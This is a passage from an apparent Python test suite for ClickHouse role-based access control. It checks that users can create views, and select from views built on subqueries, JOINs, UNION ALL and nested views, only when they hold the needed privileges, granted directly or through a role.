with When("I grant CREATE VIEW privilege"):
node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
with And("I grant SELECT privilege"):
node.query(f"GRANT SELECT ON {table_name} TO {grant_target_name}")
with And("I try to create a view on the table as the user"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT * FROM {table_name}", settings = [("user", f"{user_name}")])
with Then("I check the view"):
output = node.query(f"SELECT count(*) FROM {view_name}").output
assert output == '0', error()
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_subquery_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to create a view where the stored query has two subqueries
if and only if the user has SELECT privilege on all of the tables,
either granted directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=create_with_subquery,
name="create with subquery, privilege granted directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=create_with_subquery,
name="create with subquery, privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_subquery(self, user_name, grant_target_name, node=None):
"""Grant select and create view privileges and check that user is able to create a view
if and only if they have all necessary privileges.
"""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
table2_name = f"table2_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
create_view_query = "CREATE VIEW {view_name} AS SELECT * FROM {table0_name} WHERE y IN (SELECT y FROM {table1_name} WHERE y IN (SELECT y FROM {table2_name} WHERE y<2))"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name},{table2_name}"):
try:
with When("I grant CREATE VIEW privilege"):
node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
with Then("I attempt to CREATE VIEW as the user with create privilege"):
node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name, table2_name=table2_name), settings = [("user", f"{user_name}")],
exitcode=exitcode, message=message)
for permutation in permutations(table_count=3):
with grant_select_on_table(node, permutation, grant_target_name, table0_name, table1_name, table2_name) as tables_granted:
with When(f"permutation={permutation}, tables granted = {tables_granted}"):
with Given("I don't have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
with Then("I attempt to create a view as the user"):
node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name, table2_name=table2_name), settings = [("user", f"{user_name}")],
exitcode=exitcode, message=message)
with When("I grant select on all tables"):
with grant_select_on_table(node, max(permutations(table_count=3))+1, grant_target_name, table0_name, table1_name, table2_name):
with Given("I don't have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
with Then("I attempt to create a view as the user"):
node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name, table2_name=table2_name), settings = [("user", f"{user_name}")])
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_join_query_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to create a view where the stored query includes a `JOIN` statement
if and only if the user has SELECT privilege on all of the tables,
either granted directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=create_with_join_query,
name="create with join query, privilege granted directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=create_with_join_query,
name="create with join query, privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_join_query(self, grant_target_name, user_name, node=None):
"""Grant select and create view privileges and check that user is able to create a view
if and only if they have all necessary privileges.
"""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
create_view_query = "CREATE VIEW {view_name} AS SELECT * FROM {table0_name} JOIN {table1_name} USING d"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name}"):
try:
with When("I grant CREATE VIEW privilege"):
node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
with Then("I attempt to create view as the user"):
node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name), settings = [("user", f"{user_name}")],
exitcode=exitcode, message=message)
for permutation in permutations(table_count=2):
with grant_select_on_table(node, permutation, grant_target_name, table0_name, table1_name) as tables_granted:
with When(f"permutation={permutation}, tables granted = {tables_granted}"):
with Given("I don't have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
with Then("I attempt to create a view as the user"):
node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name), settings = [("user", f"{user_name}")],
exitcode=exitcode, message=message)
with When("I grant select on all tables"):
with grant_select_on_table(node, max(permutations(table_count=2))+1, grant_target_name, table0_name, table1_name):
with Given("I don't have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
with Then("I attempt to create a view as the user"):
node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name), settings = [("user", f"{user_name}")])
finally:
with Then("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_union_query_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to create a view where the stored query includes a `UNION ALL` statement
if and only if the user has SELECT privilege on all of the tables,
either granted directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=create_with_union_query,
name="create with union query, privilege granted directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=create_with_union_query,
name="create with union query, privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_union_query(self, grant_target_name, user_name, node=None):
"""Grant select and create view privileges and check that user is able to create a view
if and only if they have all necessary privileges.
"""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
create_view_query = "CREATE VIEW {view_name} AS SELECT * FROM {table0_name} UNION ALL SELECT * FROM {table1_name}"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name}"):
try:
with When("I grant CREATE VIEW privilege"):
node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
with Then("I attempt to create view as the user"):
node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name), settings = [("user", f"{user_name}")],
exitcode=exitcode, message=message)
for permutation in permutations(table_count=2):
with grant_select_on_table(node, permutation, grant_target_name, table0_name, table1_name) as tables_granted:
with When(f"permutation={permutation}, tables granted = {tables_granted}"):
with Given("I don't have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
with Then("I attempt to create a view as the user"):
node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name), settings = [("user", f"{user_name}")],
exitcode=exitcode, message=message)
with When("I grant select on all tables"):
with grant_select_on_table(node, max(permutations(table_count=2))+1, grant_target_name, table0_name, table1_name):
with Given("I don't have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
with Then("I attempt to create a view as the user"):
node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name), settings = [("user", f"{user_name}")])
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_join_union_subquery_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to create a view with a stored query that includes `UNION ALL`, `JOIN` and two subqueries
if and only if the user has SELECT privilege on all of the tables, either granted directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=create_with_join_union_subquery,
name="create with join union subquery, privilege granted directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=create_with_join_union_subquery,
name="create with join union subquery, privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_join_union_subquery(self, grant_target_name, user_name, node=None):
"""Grant select and create view privileges and check that user is able to create a view
if and only if they have all necessary privileges.
"""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
table2_name = f"table2_{getuid()}"
table3_name = f"table3_{getuid()}"
table4_name = f"table4_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
create_view_query = "CREATE VIEW {view_name} AS SELECT y FROM {table0_name} JOIN {table1_name} USING y UNION ALL SELECT y FROM {table1_name} WHERE y IN (SELECT y FROM {table3_name} WHERE y IN (SELECT y FROM {table4_name} WHERE y<2))"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name},{table2_name},{table3_name},{table4_name}"):
with user(node, f"{user_name}"):
try:
with When("I grant CREATE VIEW privilege"):
node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
with Then("I attempt to create view as the user with CREATE VIEW privilege"):
node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name, table2_name=table2_name, table3_name=table3_name, table4_name=table4_name),
settings = [("user", f"{user_name}")], exitcode=exitcode, message=message)
for permutation in permutations(table_count=5):
with grant_select_on_table(node, permutation, grant_target_name, table0_name, table1_name, table3_name, table4_name) as tables_granted:
with When(f"permutation={permutation}, tables granted = {tables_granted}"):
with Given("I don't have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
with Then("I attempt to create a view as the user"):
node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name, table2_name=table2_name, table3_name=table3_name, table4_name=table4_name),
settings = [("user", f"{user_name}")], exitcode=exitcode, message=message)
with When("I grant select on all tables"):
with grant_select_on_table(node, max(permutations(table_count=5))+1, grant_target_name, table0_name, table1_name, table2_name, table3_name, table4_name):
with Given("I don't have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
with Then("I attempt to create a view as the user"):
node.query(create_view_query.format(view_name=view_name, table0_name=table0_name, table1_name=table1_name, table2_name=table2_name, table3_name=table3_name, table4_name=table4_name),
settings = [("user", f"{user_name}")])
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_nested_views_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to create a view with a stored query that includes other views if and only if
they have SELECT privilege on all the views and the source tables for those views.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=create_with_nested_views,
name="create with nested views, privilege granted directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=create_with_nested_views,
name="create with nested views, privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_nested_views(self, grant_target_name, user_name, node=None):
"""Grant select and create view privileges and check that user is able to create a view
if and only if they have all necessary privileges.
"""
view0_name = f"view0_{getuid()}"
view1_name = f"view1_{getuid()}"
view2_name = f"view2_{getuid()}"
view3_name = f"view3_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
table2_name = f"table2_{getuid()}"
table3_name = f"table3_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
create_view_query = "CREATE VIEW {view3_name} AS SELECT y FROM {table3_name} UNION ALL SELECT y FROM {view2_name}"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name},{table2_name},{table3_name}"):
try:
with Given("I have some views"):
node.query(f"CREATE VIEW {view0_name} AS SELECT y FROM {table0_name}")
node.query(f"CREATE VIEW {view1_name} AS SELECT y FROM {table1_name} WHERE y IN (SELECT y FROM {view0_name} WHERE y<2)")
node.query(f"CREATE VIEW {view2_name} AS SELECT y FROM {table2_name} JOIN {view1_name} USING y")
with When("I grant CREATE VIEW privilege"):
node.query(f"GRANT CREATE VIEW ON {view3_name} TO {grant_target_name}")
with Then("I attempt to create view as the user with CREATE VIEW privilege"):
node.query(create_view_query.format(view3_name=view3_name, view2_name=view2_name, table3_name=table3_name),
settings = [("user",f"{user_name}")], exitcode=exitcode, message=message)
for permutation in ([0,1,2,3,7,11,15,31,39,79,95],permutations(table_count=7))[self.context.stress]:
with grant_select_on_table(node, permutation, grant_target_name, view2_name, table3_name, view1_name, table2_name, view0_name, table1_name, table0_name) as tables_granted:
with When(f"permutation={permutation}, tables granted = {tables_granted}"):
with Given("I don't have a view"):
node.query(f"DROP VIEW IF EXISTS {view3_name}")
with Then("I attempt to create a view as the user"):
node.query(create_view_query.format(view3_name=view3_name, view2_name=view2_name, table3_name=table3_name),
settings = [("user", f"{user_name}")], exitcode=exitcode, message=message)
with When("I grant select on all views"):
with grant_select_on_table(node, max(permutations(table_count=7))+1, grant_target_name, view0_name, view1_name, view2_name, table0_name, table1_name, table2_name, table3_name):
with Given("I don't have a view"):
node.query(f"DROP VIEW IF EXISTS {view3_name}")
with Then("I attempt to create a view as the user"):
node.query(create_view_query.format(view3_name=view3_name, view2_name=view2_name, table3_name=table3_name),
settings = [("user", f"{user_name}")])
finally:
with Finally("I drop the views"):
with When("I drop view0", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view3_name}")
with And("I drop view1", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view2_name}")
with And("I drop view2", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view1_name}")
with And("I drop view3", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view0_name}")
@TestSuite
@Requirements(
RQ_SRS_006_RBAC_View_Select("1.0"),
)
def select(self, node=None):
"""Test the RBAC functionality of the `SELECT FROM view` command.
"""
Scenario(run=select_without_select_privilege)
Scenario(run=select_with_select_privilege_granted_directly_or_via_role)
Scenario(run=select_with_select_privilege_revoked_directly_or_from_role)
Scenario(run=select_without_source_table_privilege)
Scenario(run=select_with_source_table_privilege_granted_directly_or_via_role)
Scenario(run=select_with_subquery_privilege_granted_directly_or_via_role)
Scenario(run=select_with_join_query_privilege_granted_directly_or_via_role)
Scenario(run=select_with_union_query_privilege_granted_directly_or_via_role)
Scenario(run=select_with_join_union_subquery_privilege_granted_directly_or_via_role)
Scenario(run=select_with_nested_views_privilege_granted_directly_or_via_role)
@TestScenario
def select_without_select_privilege(self, node=None):
"""Check that user is unable to select on a view without view SELECT privilege.
"""
user_name = f"user_{getuid()}"
view_name = f"view_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
try:
with When("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT 1")
with Then("I try to select from view without privilege as the user"):
node.query(f"SELECT * FROM {view_name}", settings = [("user",f"{user_name}")],
exitcode=exitcode, message=message)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_select_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to select from a view if and only if they have select privilege on that view, either directly or from a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=select_with_select_privilege,
name="select with select privilege granted directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=select_with_select_privilege,
name="select with select privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_select_privilege(self, user_name, grant_target_name, node=None):
"""Grant SELECT privilege on a view and check the user is able to SELECT from it.
"""
view_name = f"view_{getuid()}"
if node is None:
node = self.context.node
try:
with When("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT 1")
with And("I grant SELECT privilege for the view"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
with Then("I attempt to select from view with privilege as the user"):
output = node.query(f"SELECT count(*) FROM {view_name}", settings = [("user",f"{user_name}")]).output
assert output == '1', error()
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_select_privilege_revoked_directly_or_from_role(self, node=None):
"""Check that user is unable to select from a view if their SELECT privilege is revoked, either directly or from a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=select_with_select_privilege,
name="select with select privilege revoked directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=select_with_select_privilege,
name="select with select privilege revoked from a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_revoked_select_privilege(self, user_name, grant_target_name, node=None):
"""Grant and revoke SELECT privilege on a view and check the user is unable to SELECT from it.
"""
view_name = f"view_{getuid()}"
if node is None:
node = self.context.node
try:
with When("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT 1")
with And("I grant SELECT privilege for the view"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
with And("I revoke SELECT privilege for the view"):
node.query(f"REVOKE SELECT ON {view_name} FROM {grant_target_name}")
with Then("I attempt to select from view with privilege as the user"):
node.query(f"SELECT count(*) FROM {view_name}", settings = [("user",f"{user_name}")],
exitcode=exitcode, message=message)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_without_source_table_privilege(self, node=None):
"""Check that user is unable to select from a view without SELECT privilege for the source table.
"""
user_name = f"user_{getuid()}"
view_name = f"view_{getuid()}"
table_name = f"table_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
with table(node, f"{table_name}"):
with user(node, f"{user_name}"):
try:
with When("I create a view from the source table"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT * FROM {table_name}")
with And("I grant view select privilege to the user"):
node.query(f"GRANT SELECT ON {view_name} TO {user_name}")
with Then("I attempt to select from view without privilege on the source table"):
node.query(f"SELECT count(*) FROM {view_name}", settings = [("user",f"{user_name}")],
exitcode=exitcode, message=message)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_source_table_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to select from a view, with source table in the stored query, if and only if
the user has SELECT privilege for the view and the source table, either directly or from a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=select_with_source_table_privilege,
name="select with source table, privilege granted directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=select_with_source_table_privilege,
name="select with source table, privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_source_table_privilege(self, user_name, grant_target_name, node=None):
"""Grant SELECT privilege on view and the source table for that view and check the user is able to SELECT from the view.
"""
view_name = f"view_{getuid()}"
table_name = f"table_{getuid()}"
if node is None:
node = self.context.node
with table(node, f"{table_name}"):
try:
with Given("I have a view with a source table"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT * FROM {table_name}")
with And("I grant select privileges"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
node.query(f"GRANT SELECT ON {table_name} TO {grant_target_name}")
with Then("I check the user is able to select from the view"):
output = node.query(f"SELECT count(*) FROM {view_name}", settings = [("user", f"{user_name}")]).output
assert output == '0', error()
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_subquery_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to select from a view where the stored query has two subqueries if and only if
the user has SELECT privilege for that view and all tables, either directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=select_with_subquery,
name="select with subquery, privilege granted directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=select_with_subquery,
name="select with subquery, privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_subquery(self, user_name, grant_target_name, node=None):
"""Grant SELECT on the view and tables in the stored query and check the user is able to SELECT if and only if they have SELECT privilege on all of them.
"""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
table2_name = f"table2_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
select_view_query = "SELECT count(*) FROM {view_name}"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name},{table2_name}"):
try:
with Given("I have a view with a subquery"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT * FROM {table0_name} WHERE y IN (SELECT y FROM {table1_name} WHERE y IN (SELECT y FROM {table2_name} WHERE y<2))")
with When("I grant SELECT privilege on view"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
with Then("I attempt to select from the view as the user"):
node.query(select_view_query.format(view_name=view_name), settings = [("user",f"{user_name}")], exitcode=exitcode, message=message)
for permutation in permutations(table_count=3):
with grant_select_on_table(node, permutation, grant_target_name, table0_name, table1_name, table2_name) as tables_granted:
with When(f"permutation={permutation}, tables granted = {tables_granted}"):
with Then("I attempt to select from a view as the user"):
node.query(select_view_query.format(view_name=view_name), settings = [("user", f"{user_name}")], exitcode=exitcode, message=message)
with When("I grant select on all tables"):
with grant_select_on_table(node, max(permutations(table_count=3))+1, grant_target_name, table0_name, table1_name, table2_name):
with Then("I attempt to select from a view as the user"):
output = node.query(select_view_query.format(view_name=view_name), settings = [("user", f"{user_name}")]).output
assert output == '0', error()
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_join_query_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to select from a view where the stored query includes a `JOIN` statement if and only if
the user has SELECT privilege on all the tables and the view, either directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=select_with_join_query,
name="select with join, privilege granted directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=select_with_join_query,
name="select with join, privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_join_query(self, user_name, grant_target_name, node=None):
"""Grant SELECT on the view and tables in the stored query and check the user is able to SELECT if and only if they have SELECT privilege on all of them.
"""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
select_view_query = "SELECT count(*) FROM {view_name}"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name}"):
try:
with Given("I have a view with a JOIN statement"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT * FROM {table0_name} JOIN {table1_name} USING d")
with When("I grant SELECT privilege on view"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
with Then("I attempt to select from the view as the user"):
node.query(select_view_query.format(view_name=view_name), settings = [("user",f"{user_name}")], exitcode=exitcode, message=message)
for permutation in permutations(table_count=2):
with grant_select_on_table(node, permutation, grant_target_name, table0_name, table1_name) as tables_granted:
with When(f"permutation={permutation}, tables granted = {tables_granted}"):
with Then("I attempt to select from a view as the user"):
node.query(select_view_query.format(view_name=view_name), settings = [("user", f"{user_name}")], exitcode=exitcode, message=message)
with When("I grant select on all tables"):
with grant_select_on_table(node, max(permutations(table_count=2))+1, grant_target_name, table0_name, table1_name):
with Then("I attempt to select from a view as the user"):
node.query(select_view_query.format(view_name=view_name), settings = [("user", f"{user_name}")])
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_union_query_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to select from a view where the stored query includes a `UNION ALL` statement if and only if
the user has SELECT privilege on all the tables and the view, either directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=select_with_union_query,
name="select with union, privilege granted directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=select_with_union_query,
name="select with union, privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_union_query(self, user_name, grant_target_name, node=None):
"""Grant SELECT on the view and tables in the stored query and check the user is able to SELECT if and only if they have SELECT privilege on all of them.
"""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
select_view_query = "SELECT count(*) FROM {view_name}"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name}"):
try:
with Given("I have a view with a UNION statement"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT * FROM {table0_name} UNION ALL SELECT * FROM {table1_name}")
with When("I grant SELECT privilege on view"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
with Then("I attempt to select from the view as the user"):
node.query(select_view_query.format(view_name=view_name), settings = [("user",f"{user_name}")], exitcode=exitcode, message=message)
for permutation in permutations(table_count=2):
with grant_select_on_table(node, permutation, grant_target_name, table0_name, table1_name) as tables_granted:
with When(f"permutation={permutation}, tables granted = {tables_granted}"):
with Then("I attempt to select from a view as the user"):
node.query(select_view_query.format(view_name=view_name), settings = [("user", f"{user_name}")], exitcode=exitcode, message=message)
with When("I grant select on all tables"):
with grant_select_on_table(node, max(permutations(table_count=2))+1, grant_target_name, table0_name, table1_name):
with Then("I attempt to select from a view as the user"):
node.query(select_view_query.format(view_name=view_name), settings = [("user", f"{user_name}")])
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_join_union_subquery_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to select from a view with a stored query that includes `UNION ALL`, `JOIN` and two subqueries
if and only if the user has SELECT privilege on all the tables and the view, either directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(test=select_with_join_union_subquery,
name="select with join union subquery, privilege granted directly")(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(test=select_with_join_union_subquery,
name="select with join union subquery, privilege granted through a role")(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_join_union_subquery(self, grant_target_name, user_name, node=None):
"""Grant SELECT on the view and tables in the stored query and check the user is able to SELECT if and only if they have SELECT privilege on all of them.
"""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
table2_name = f"table2_{getuid()}"
table3_name = f"table3_{getuid()}"
table4_name = f"table4_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
select_view_query = "SELECT count(*) FROM {view_name}"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name},{table2_name},{table3_name},{table4_name}"):
try:
with Given("I have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"CREATE VIEW {view_name} AS SELECT y FROM {table0_name} JOIN {table1_name} USING y UNION ALL SELECT y FROM {table1_name} WHERE y IN (SELECT y FROM {table3_name} WHERE y IN (SELECT y FROM {table4_name} WHERE y<2))")
with When("I grant SELECT privilege on view"):
node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
with Then("I attempt to select from the view as the user"):
node.query(select_view_query.format(view_name=view_name), settings = [("user", f"{user_name}")], exitcode=exitcode, message=message)
for permutation in permutations(table_count=5):
with grant_select_on_table(node, permutation, grant_target_name, table0_name, table1_name, table2_name, table3_name, table4_name) as tables_granted:
with When(f"permutation={permutation}, tables granted = {tables_granted}"):
with Then("I attempt to select from a view as the user"):
node.query(select_view_query.format(view_name=view_name), settings = [("user", f"{user_name}")], exitcode=exitcode, message=message)
with When("I grant select on all tables"):
with grant_select_on_table(node, max(permutations(table_count=5))+1, grant_target_name, table0_name, table1_name, table2_name, table3_name, table4_name):
with Then("I attempt to select from a view as the user"):
node.query(select_view_query.format(view_name=view_name), settings = [("user", f"{user_name}")])
finally:
with Finally("I drop the view"):
